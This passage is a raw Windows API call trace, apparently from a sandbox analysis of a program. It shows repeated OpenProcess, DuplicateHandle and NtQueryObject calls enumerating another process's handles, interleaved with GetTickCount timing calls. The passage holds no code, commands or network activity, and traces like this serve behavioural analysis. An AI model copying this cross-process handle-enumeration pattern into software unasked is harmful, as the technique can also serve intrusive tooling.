(in: hSourceProcessHandle=0x198, hSourceHandle=0x2b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.221] GetTickCount () returned 0xe86355 [0113.221] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.221] GetTickCount () returned 0xe86355 [0113.221] GetTickCount () returned 0xe86355 [0113.221] CloseHandle (hObject=0x1b8) returned 1 [0113.221] GetTickCount () returned 0xe86355 [0113.222] CloseHandle (hObject=0x198) returned 1 [0113.222] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.222] GetTickCount () returned 0xe86355 [0113.222] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.222] GetTickCount () returned 0xe86355 [0113.222] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.222] GetTickCount () returned 0xe86355 [0113.222] GetTickCount () returned 0xe86355 [0113.222] CloseHandle (hObject=0x1b8) returned 1 [0113.222] GetTickCount () returned 0xe86355 [0113.222] CloseHandle (hObject=0x198) returned 1 [0113.222] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.222] GetTickCount () returned 0xe86355 [0113.222] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.222] GetTickCount () returned 0xe86355 [0113.223] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.223] GetTickCount () returned 0xe86355 [0113.223] GetTickCount () returned 0xe86355 [0113.223] CloseHandle (hObject=0x1b8) returned 1 [0113.223] GetTickCount () returned 0xe86355 [0113.223] CloseHandle (hObject=0x198) returned 1 [0113.223] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.223] GetTickCount () returned 0xe86355 [0113.223] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.223] GetTickCount () returned 0xe86355 [0113.223] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.223] GetTickCount () returned 0xe86355 [0113.224] GetTickCount () returned 0xe86355 [0113.224] CloseHandle (hObject=0x1b8) returned 1 [0113.224] GetTickCount () returned 0xe86355 [0113.224] CloseHandle (hObject=0x198) returned 1 [0113.224] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.224] GetTickCount () returned 0xe86355 [0113.224] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.224] GetTickCount () returned 0xe86355 [0113.224] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.224] GetTickCount () returned 0xe86355 [0113.224] GetTickCount () returned 0xe86355 [0113.224] CloseHandle (hObject=0x1b8) returned 1 [0113.224] GetTickCount () returned 0xe86355 [0113.224] CloseHandle (hObject=0x198) returned 1 [0113.224] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.225] GetTickCount () returned 0xe86355 [0113.225] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.225] GetTickCount () returned 0xe86355 [0113.225] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.225] GetTickCount () returned 0xe86355 [0113.225] GetTickCount () returned 0xe86355 [0113.225] CloseHandle (hObject=0x1b8) returned 1 [0113.225] GetTickCount () returned 0xe86355 [0113.225] CloseHandle (hObject=0x198) returned 1 [0113.225] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.225] GetTickCount () returned 0xe86355 [0113.225] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.225] GetTickCount () returned 0xe86355 [0113.225] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.225] GetTickCount () returned 0xe86355 [0113.226] GetTickCount () returned 0xe86355 [0113.226] CloseHandle (hObject=0x1b8) returned 1 [0113.226] GetTickCount () returned 0xe86355 [0113.226] CloseHandle (hObject=0x198) returned 1 [0113.226] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.226] GetTickCount () returned 0xe86355 [0113.226] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.226] GetTickCount () returned 0xe86364 [0113.226] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.226] GetTickCount () returned 0xe86364 [0113.226] GetTickCount () returned 0xe86364 [0113.226] CloseHandle (hObject=0x1b8) returned 1 [0113.226] GetTickCount () returned 0xe86364 [0113.226] CloseHandle (hObject=0x198) returned 1 [0113.226] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.227] GetTickCount () returned 0xe86364 [0113.227] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.227] GetTickCount () returned 0xe86364 [0113.227] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.227] GetTickCount () returned 0xe86364 [0113.227] GetTickCount () returned 0xe86364 [0113.227] CloseHandle (hObject=0x1b8) returned 1 [0113.227] GetTickCount () returned 0xe86364 [0113.227] CloseHandle (hObject=0x198) returned 1 [0113.227] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.227] GetTickCount () returned 0xe86364 [0113.227] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.227] GetTickCount () returned 0xe86364 [0113.227] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.227] GetTickCount () returned 0xe86364 [0113.228] GetTickCount () returned 0xe86364 [0113.228] CloseHandle (hObject=0x1b8) returned 1 [0113.228] GetTickCount () returned 0xe86364 [0113.228] CloseHandle (hObject=0x198) returned 1 [0113.228] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.228] GetTickCount () returned 0xe86364 [0113.228] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.228] GetTickCount () returned 0xe86364 [0113.228] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.228] GetTickCount () returned 0xe86364 [0113.228] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.228] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.228] GetTickCount () returned 0xe86364 [0113.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.229] GetTickCount () returned 0xe86364 [0113.229] CloseHandle (hObject=0x1b8) returned 1 [0113.229] GetTickCount () returned 0xe86364 [0113.229] CloseHandle (hObject=0x198) returned 1 [0113.229] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.229] GetTickCount () returned 0xe86364 [0113.229] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.229] GetTickCount () returned 0xe86364 [0113.229] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.229] GetTickCount () returned 0xe86364 [0113.229] GetTickCount () returned 0xe86364 [0113.229] CloseHandle (hObject=0x1b8) returned 1 [0113.229] GetTickCount () returned 0xe86364 [0113.230] CloseHandle (hObject=0x198) returned 1 [0113.230] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.230] GetTickCount () returned 0xe86364 [0113.230] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.230] GetTickCount () returned 0xe86364 [0113.230] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.230] GetTickCount () returned 0xe86364 [0113.230] GetTickCount () returned 0xe86364 [0113.230] CloseHandle (hObject=0x1b8) returned 1 [0113.230] GetTickCount () returned 0xe86364 [0113.230] CloseHandle (hObject=0x198) returned 1 [0113.230] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.230] GetTickCount () returned 0xe86364 [0113.231] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.231] GetTickCount () returned 0xe86364 [0113.231] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.231] GetTickCount () returned 0xe86364 [0113.231] GetTickCount () returned 0xe86364 [0113.231] CloseHandle (hObject=0x1b8) returned 1 [0113.231] GetTickCount () returned 0xe86364 [0113.231] CloseHandle (hObject=0x198) returned 1 [0113.231] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.231] GetTickCount () returned 0xe86364 [0113.231] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.231] GetTickCount () returned 0xe86364 [0113.231] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.231] GetTickCount () returned 0xe86364 [0113.232] GetTickCount () returned 0xe86364 [0113.232] CloseHandle (hObject=0x1b8) returned 1 [0113.232] GetTickCount () returned 0xe86364 [0113.232] CloseHandle (hObject=0x198) returned 1 [0113.232] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.232] GetTickCount () returned 0xe86364 [0113.232] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.233] GetTickCount () returned 0xe86364 [0113.233] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.233] GetTickCount () returned 0xe86364 [0113.233] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.234] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.234] GetTickCount () returned 0xe86364 [0113.234] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.234] GetTickCount () returned 0xe86364 [0113.234] CloseHandle (hObject=0x1b8) returned 1 [0113.234] GetTickCount () returned 0xe86364 [0113.234] CloseHandle (hObject=0x198) returned 1 [0113.234] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.234] GetTickCount () returned 0xe86364 [0113.234] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.234] GetTickCount () returned 0xe86364 [0113.234] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.234] GetTickCount () returned 0xe86364 [0113.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.234] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.234] GetTickCount () returned 0xe86364 [0113.235] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.235] GetTickCount () returned 0xe86364 [0113.235] CloseHandle (hObject=0x1b8) returned 1 [0113.235] GetTickCount () returned 0xe86364 [0113.235] CloseHandle (hObject=0x198) returned 1 [0113.235] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.235] GetTickCount () returned 0xe86364 [0113.235] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.235] GetTickCount () returned 0xe86364 [0113.235] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.235] GetTickCount () returned 0xe86364 [0113.235] GetTickCount () returned 0xe86364 [0113.235] CloseHandle (hObject=0x1b8) returned 1 [0113.235] GetTickCount () returned 0xe86364 [0113.235] CloseHandle (hObject=0x198) returned 1 [0113.236] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.236] GetTickCount () returned 0xe86364 [0113.236] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.236] GetTickCount () returned 0xe86364 [0113.236] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.236] GetTickCount () returned 0xe86364 [0113.236] GetTickCount () returned 0xe86364 [0113.236] CloseHandle (hObject=0x1b8) returned 1 [0113.236] GetTickCount () returned 0xe86364 [0113.236] CloseHandle (hObject=0x198) returned 1 [0113.236] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.236] GetTickCount () returned 0xe86364 [0113.236] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x300, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.236] GetTickCount () returned 0xe86364 [0113.236] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.236] GetTickCount () returned 0xe86364 [0113.237] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.237] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.237] GetTickCount () returned 0xe86364 [0113.237] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.237] GetTickCount () returned 0xe86364 [0113.237] CloseHandle (hObject=0x1b8) returned 1 [0113.237] GetTickCount () returned 0xe86364 [0113.237] CloseHandle (hObject=0x198) returned 1 [0113.237] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.237] GetTickCount () returned 0xe86364 [0113.237] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x304, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.237] GetTickCount () returned 0xe86364 [0113.237] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.237] GetTickCount () returned 0xe86364 [0113.237] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.238] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.238] GetTickCount () returned 0xe86364 [0113.238] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.238] GetTickCount () returned 0xe86364 [0113.238] CloseHandle (hObject=0x1b8) returned 1 [0113.238] GetTickCount () returned 0xe86364 [0113.238] CloseHandle (hObject=0x198) returned 1 [0113.238] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.238] GetTickCount () returned 0xe86364 [0113.238] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x308, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.238] GetTickCount () returned 0xe86364 [0113.238] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.238] GetTickCount () returned 0xe86364 [0113.238] GetTickCount () returned 0xe86364 [0113.239] CloseHandle (hObject=0x1b8) returned 1 [0113.239] GetTickCount () returned 0xe86364 [0113.239] CloseHandle (hObject=0x198) returned 1 [0113.239] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.239] GetTickCount () returned 0xe86364 [0113.239] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x30c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.239] GetTickCount () returned 0xe86364 [0113.239] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.239] GetTickCount () returned 0xe86364 [0113.239] GetTickCount () returned 0xe86364 [0113.239] CloseHandle (hObject=0x1b8) returned 1 [0113.239] GetTickCount () returned 0xe86364 [0113.239] CloseHandle (hObject=0x198) returned 1 [0113.239] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.239] GetTickCount () returned 0xe86364 [0113.239] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x310, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.239] GetTickCount () returned 0xe86364 [0113.240] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.240] GetTickCount () returned 0xe86364 [0113.240] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.240] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.240] GetTickCount () returned 0xe86364 [0113.240] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.240] GetTickCount () returned 0xe86364 [0113.240] CloseHandle (hObject=0x1b8) returned 1 [0113.240] GetTickCount () returned 0xe86364 [0113.240] CloseHandle (hObject=0x198) returned 1 [0113.240] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.240] GetTickCount () returned 0xe86364 [0113.240] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x314, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.240] GetTickCount () returned 0xe86364 [0113.240] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.240] GetTickCount () returned 0xe86364 [0113.240] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.240] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.241] GetTickCount () returned 0xe86364 [0113.241] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.241] GetTickCount () returned 0xe86364 [0113.241] CloseHandle (hObject=0x1b8) returned 1 [0113.241] GetTickCount () returned 0xe86364 [0113.241] CloseHandle (hObject=0x198) returned 1 [0113.241] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.241] GetTickCount () returned 0xe86364 [0113.241] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x318, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.241] GetTickCount () returned 0xe86364 [0113.241] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.241] GetTickCount () returned 0xe86364 [0113.241] GetTickCount () returned 0xe86364 [0113.241] CloseHandle (hObject=0x1b8) returned 1 [0113.241] GetTickCount () returned 0xe86364 [0113.241] CloseHandle (hObject=0x198) returned 1 [0113.241] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.242] GetTickCount () returned 0xe86364 [0113.242] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x31c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.242] GetTickCount () returned 0xe86364 [0113.242] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.242] GetTickCount () returned 0xe86364 [0113.242] GetTickCount () returned 0xe86364 [0113.242] CloseHandle (hObject=0x1b8) returned 1 [0113.242] GetTickCount () returned 0xe86364 [0113.242] CloseHandle (hObject=0x198) returned 1 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, 